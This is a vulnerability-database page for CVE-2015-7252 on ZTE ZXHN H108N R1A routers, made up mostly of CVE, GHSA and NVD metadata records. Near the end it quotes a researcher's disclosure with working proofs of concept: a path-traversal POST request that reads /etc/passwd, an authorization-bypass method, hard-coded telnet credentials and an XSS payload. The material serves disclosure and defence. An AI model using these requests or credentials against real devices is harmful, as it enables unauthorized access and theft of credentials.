cve-2015-7252

Vulnerability from cvelistv5

Published

2015-12-30 02:00

Modified

2024-08-06 07:43

Severity ?

Summary

References

URL	Tags
cret@cert.org	http://www.securityfocus.com/bid/77421
cret@cert.org	https://www.exploit-db.com/exploits/38773/
cret@cert.org	https://www.kb.cert.org/vuls/id/391604	Third Party Advisory, US Government Resource
cret@cert.org	https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/77421
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/38773/
af854a3a-2127-422b-91ae-364da2661108	https://www.kb.cert.org/vuls/id/391604	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T07:43:45.919Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "77421",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/77421"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
          },
          {
            "name": "VU#391604",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "https://www.kb.cert.org/vuls/id/391604"
          },
          {
            "name": "38773",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/38773/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-11-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-12T09:57:01",
        "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "shortName": "certcc"
      },
      "references": [
        {
          "name": "77421",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/77421"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
        },
        {
          "name": "VU#391604",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "https://www.kb.cert.org/vuls/id/391604"
        },
        {
          "name": "38773",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/38773/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2015-7252",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "77421",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/77421"
            },
            {
              "name": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA",
              "refsource": "CONFIRM",
              "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
            },
            {
              "name": "VU#391604",
              "refsource": "CERT-VN",
              "url": "https://www.kb.cert.org/vuls/id/391604"
            },
            {
              "name": "38773",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/38773/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
    "assignerShortName": "certcc",
    "cveId": "CVE-2015-7252",
    "datePublished": "2015-12-30T02:00:00",
    "dateReserved": "2015-09-18T00:00:00",
    "dateUpdated": "2024-08-06T07:43:45.919Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2015-7252\",\"sourceIdentifier\":\"cret@cert.org\",\"published\":\"2015-12-30T05:59:05.020\",\"lastModified\":\"2024-11-21T02:36:26.400\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.\"},{\"lang\":\"es\",\"value\":\"Vulnerabilidad de XSS en cgi-bin/webproc en dispositivos ZTE ZXHN H108N R1A en versiones anteriores a ZTE.bhs.ZXHNH108NR1A.k_PE permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s del par\u00e1metro errorpage.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:zte:zxhn_h108n_r1a_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"zte.bhs.zxhnh108nr1a.h_pe\",\"matchCriteriaId\":\"B3F8294C-E254-4328-8884-C27B9F880D01\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:zte:zxhn_h108n_r1a:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5A0A9215-1F66-4A0B-BF01-0064769F6812\"}]}]}],\"references\":[{\"url\":\"http://www.securityfocus.com/bid/77421\",\"source\":\"cret@cert.org\"},{\"url\":\"https://www.exploit-db.com/exploits/38773/\",\"source\":\"cret@cert.org\"},{\"url\":\"https://www.kb.cert.org/vuls/id/391604\",\"source\":\"cret@cert.org\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA\",\"source\":\"cret@cert.org\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://www.securityfocus.com/bid/77421\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/38773/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.kb.cert.org/vuls/id/391604\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]}]}}"
  }
}

ghsa-v877-jx8x-6qr4

Vulnerability from github

Published

2022-05-17 01:07

Modified

2022-05-17 01:07

Severity ?

6.1 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2015-7252"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2015-12-30T05:59:00Z",
    "severity": "MODERATE"
  },
  "details": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.",
  "id": "GHSA-v877-jx8x-6qr4",
  "modified": "2022-05-17T01:07:27Z",
  "published": "2022-05-17T01:07:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7252"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/38773"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/391604"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/77421"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

gsd-2015-7252

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2015-7252

Aliases

CVE-2015-7252

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2015-7252",
    "description": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.",
    "id": "GSD-2015-7252",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2015-7252"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2015-7252"
      ],
      "details": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.",
      "id": "GSD-2015-7252",
      "modified": "2023-12-13T01:20:01.207148Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cert@cert.org",
        "ID": "CVE-2015-7252",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "77421",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/77421"
          },
          {
            "name": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA",
            "refsource": "CONFIRM",
            "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
          },
          {
            "name": "VU#391604",
            "refsource": "CERT-VN",
            "url": "https://www.kb.cert.org/vuls/id/391604"
          },
          {
            "name": "38773",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/38773/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zte:zxhn_h108n_r1a_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "zte.bhs.zxhnh108nr1a.h_pe",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zte:zxhn_h108n_r1a:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2015-7252"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA",
              "refsource": "CONFIRM",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
            },
            {
              "name": "VU#391604",
              "refsource": "CERT-VN",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://www.kb.cert.org/vuls/id/391604"
            },
            {
              "name": "77421",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/77421"
            },
            {
              "name": "38773",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/38773/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      },
      "lastModifiedDate": "2017-09-13T01:29Z",
      "publishedDate": "2015-12-30T05:59Z"
    }
  }
}

fkie_cve-2015-7252

Vulnerability from fkie_nvd

Published

2015-12-30 05:59

Modified

2024-11-21 02:36

Severity ?

6.1 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
cret@cert.org	http://www.securityfocus.com/bid/77421
cret@cert.org	https://www.exploit-db.com/exploits/38773/
cret@cert.org	https://www.kb.cert.org/vuls/id/391604	Third Party Advisory, US Government Resource
cret@cert.org	https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/77421
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/38773/
af854a3a-2127-422b-91ae-364da2661108	https://www.kb.cert.org/vuls/id/391604	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	zte	zxhn_h108n_r1a_firmware	*
	zte	zxhn_h108n_r1a	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:zte:zxhn_h108n_r1a_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3F8294C-E254-4328-8884-C27B9F880D01",
              "versionEndIncluding": "zte.bhs.zxhnh108nr1a.h_pe",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:zte:zxhn_h108n_r1a:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A0A9215-1F66-4A0B-BF01-0064769F6812",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de XSS en cgi-bin/webproc en dispositivos ZTE ZXHN H108N R1A en versiones anteriores a ZTE.bhs.ZXHNH108NR1A.k_PE permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a trav\u00e9s del par\u00e1metro errorpage."
    }
  ],
  "id": "CVE-2015-7252",
  "lastModified": "2024-11-21T02:36:26.400",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2015-12-30T05:59:05.020",
  "references": [
    {
      "source": "cret@cert.org",
      "url": "http://www.securityfocus.com/bid/77421"
    },
    {
      "source": "cret@cert.org",
      "url": "https://www.exploit-db.com/exploits/38773/"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.kb.cert.org/vuls/id/391604"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/77421"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/38773/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.kb.cert.org/vuls/id/391604"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://www.kb.cert.org/vuls/id/BLUU-9ZDJWA"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A ZTE.bhs.ZXHNH108NR1A.h_PE version of webproc cgi failed to properly handle the 'errorpage' parameter, allowing remote attackers to exploit malicious scripts to inject malicious scripts or HTML code to obtain sensitive information or hijack when malicious data is viewed User session. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. There is a cross-site scripting vulnerability in the cgi-bin/webproc URI of ZTE ZXHN H108N R1A ZTE.bhs.ZXHNH108NR1A.h_PE and earlier versions. CVE-ID: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252

Note: Large deployment size, primarily in Peru, used by TdP.

Description CWE-200 https://cwe.mitre.org/data/definitions/200.html: Information Exposure - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http:///cgi-bin/webproc

PoC:

...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip...

B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE.

CWE-285 https://cwe.mitre.org/data/definitions/285.html: Improper Authorization - CVE-2015-7249

By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed.

PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal.

PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks.

Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only.

http:// /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd

Other functions / pages may also be accessible to non-privileged users.

CWE-22 http://cwe.mitre.org/data/definitions/22.html: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system.

Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability.

PoC

HTTP POST request

POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177

getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a

HTTP Response

HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/

root:x:0:0:root:/root:/bin/bash

root:x:0:0:root:/root:/bin/sh

tw:x:504:504::/home/tw:/bin/bash

tw:x:504:504::/home/tw:/bin/msh

CWE-798 http://cwe.mitre.org/data/definitions/798.html: Use of Hard-coded Credentials - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password.

PoC

getpage=html%2Findex.html&errorpage=html%2fmain.htmlalert(1)&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a

+++++

Best Regards, Karn Ganeshen

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0232",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "zxhn h108n r1a",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zte",
